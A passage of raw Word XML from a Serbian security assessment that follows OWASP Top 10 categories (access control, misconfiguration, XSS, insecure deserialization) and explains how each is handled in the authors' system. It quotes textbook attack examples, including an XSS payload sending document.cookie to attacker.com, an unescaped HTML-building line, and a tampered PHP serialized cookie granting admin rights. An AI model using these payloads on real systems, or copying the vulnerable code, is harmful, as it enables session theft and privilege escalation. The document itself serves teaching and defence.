        </w:rPr>
        <w:t>korisniku u velikom broju slučajeva nisu korektno implementirana. Napadač koristi ove nedostatke kako bi pristupio nedozvoljenim funkcionalnostima i/ili podacima (npr. pristup drugim korisničkim nalozima, pregled osetljivih podataka, izmena podataka ostali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>h korisnika, promena prava pristupa itd).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Napadač putem URL-a nasilno pokušava da pristupi stranici za koju nema pravo pristupa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://example.com/app/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="00000A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>getappInfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://example.com/app/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>admin_getappInfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">neovlašćeni pristup funkcionalnostima ili podacima sprečavamo tako što </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">nad svim delovima sistema vršimo stalne provere </w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>prati se</w:t>
      </w:r>
      <w:r w:rsidR="004A72BC">
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> princip minimalnih  privilegija</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>na osnovu tipa korisnika koji je ulogovan, vrši se provera prava pristupa)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Loše </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>konfigurisana bezbednost jedan je od najčešćih problema. Ovo je najčešće rezultat nebezbedne podrazumevane konfiguracije, nekompletne ili ad hoc konfiguracije i loše konfigurisanih HTTP čitača. Svaki operativni sistem, frejmvork, biblioteke i aplikacije mo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>raju biti bezbedno konfigurisani i ažurirani u skladu sa najnovijim tehnologijama.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Konfiguracija aplikacionog servera dozvoljava da korisniku aplikacije budu vraćene detaljne poruke o grešci, npr. „stack trace“. Ovo potencijalno izlaže osetljive i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>nformacije ili osnovne mane kao što su korišćene verzije komponenti za koje je poznato da imaju ranjivosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>realno je očekivati da napadač bez većih poteškoća realizuje ovu vrstu napada, s obzirom na to da nije implementiran odbrambeni me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">hanizam </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(ali je arhitektura aplikacije realizovana tako da postoje jasne granice između modula). Ukoliko bi naš sistem bio stavljen u produkciju, problem bi se mogao rešiti pomoću System Hardening-a (da bi smo smanjili broj ranjivosti u sistemu, instaliral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">i bismo firewall, zatvorili suvišne portove, zabranili deljenje fajlova između programa, koristili enkripciju gde je to moguće i pravili backup-e). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="__DdeLink__443_3898603912"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Cross-Site Scripting</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t xml:space="preserve"> (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) dozvoljava napadačima da izvrše skriptu na pret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>raživaču žrtve pomoću koje mogu da preotmu korisničku sesiju, da obrišu web stranicu ili da preusmere korisnika na maliciozni sajt. XSS mane se javljaju svaki put kada aplikacija radi sa podacima na novoj web stranici bez odgovarajuće validacije ili kada s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>e ponovo učitava sadržaj web stranice sa podacima koji su dobijeni od korisnika koristeći browser API koji može da kreira HTML ili JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Aplikacija koristi neproverene podatke pri konstrukciji narednog HTML koda bez validacije ili escape-ova</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>nja:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(String) page += "&lt;input name='creditcard' type='TEXT'value='" + request.getParameter("CC") + "'&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Napadač modifikuje ’CC’ parametar u pretraživaču:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'&gt;&lt;script&gt;document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/script&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Ovaj napad rezultuje slanjem žrtvinog ID-ja sesije na web sajt napadača, dozvoljavajući napadaču da preotme korisničku sesiju žrtve.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="D4128F"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">U našem sistemu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">kako bismo smanjili mogućnost uspešne realizacije </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">ove vrste napada </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">vršimo validaciju podataka </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t>i escape-ovanje (enkodiranje)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> specijalnih karaktera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9351" w:type="dxa"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="8248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4948">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4E4E98"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>A8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8247" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Insecure Deserialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Nesigurna deserijalizacija najčešće vodi ka izvršavanju udaljenog koda. Čak i ako bi se desilo da deserijalizacione mane ne iniciraju izvršavanje udaljenog koda, mogu se iskoristiti za izvršavanje repl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>ay, injection i napada eskalacije privilegija.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="4E4E98"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Primer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>PHP forum koristi PHP objektnu serijalizaciju kako bi sačuvao „super“ cookie, koji sadrži korisnikov ID, ulogu, heširanu lozinku i druge podatke:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a:4:{i:0;i:132;i:1;s:7:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mallory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";i:2;s:4:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Napadač menja serijalizovan objekat kako bi sebi dodelio administratorske privilegije:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00AC4948">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC4948" w:rsidRDefault="00071411">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a:4:{i:0;i:1;i:1;s:5:"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>";i:2;s:5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
